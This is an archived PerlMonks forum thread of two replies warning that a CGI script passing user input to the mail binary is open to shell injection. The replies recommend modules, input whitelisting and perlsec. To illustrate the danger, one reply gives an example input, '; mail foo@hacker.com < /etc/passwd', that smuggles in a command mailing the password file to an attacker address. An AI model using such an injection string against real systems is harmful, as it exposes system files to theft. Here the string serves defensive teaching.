Beefy Boxes and Bandwidth Generously Provided by pair Networks DiBona
P is for Practical
 
PerlMonks  

Re: Yet another email question

by amphiplex (Monk)
on Jul 23, 2002 at 05:42 UTC ( [id://184364]=note: print w/replies, xml ) Need Help??

This is an archived low-energy page for bots and other anonmyous visitors. Please sign up if you are a human and want to interact.


in reply to Yet another email question

Hi !

I cant believe that this works, you have not specified any recipients ? Or ary you using some custom mail ?

Aside from this:
  • You really should be using a module, especially when using this in a CGI-Script
  • If you absolutely must use the mail binary, make sure to check the variables. If you don't check the user input here, someone could, for example, give you a dirname of "; mail foo@hacker.com < /etc/passwd". So strip out at least: [&;<>"'`|]
  • use the absolute path to your mail binary, something like /usr/bin/mail

---- amphiplex

Replies are listed 'Best First'.
Re^2: Yet another email question
by Aristotle (Chancellor) on Jul 23, 2002 at 09:49 UTC

    No no no. Don't strip out blacklisted characters. Instead, strip out any but whitelisted ones. For example, s/\W+//g. It is too easy to overlook something otherwise.

    bikeguy: you probably want to read perlsec. Also, Ovid's excellent CGI course has a good easily digestible discussion of CGI script security.

    Makeshifts last the longest.

[reply]
[d/l]

In Section Seekers of Perl Wisdom

Log In?
Username:
Password:

What's my password?
Create A New User
Domain Nodelet?

www.com | www.net | www.org
Node Status?
node history
Node Type: note [id://184364]
help
Sections?
Information?
Find Nodes?
Leftovers?
    Notices?
    hippoepoptai's answer Re: how do I set a cookie and redirect was blessed by hippo!
    erzuuliAnonymous Monks are no longer allowed to use Super Search, due to an excessive use of this resource by robots.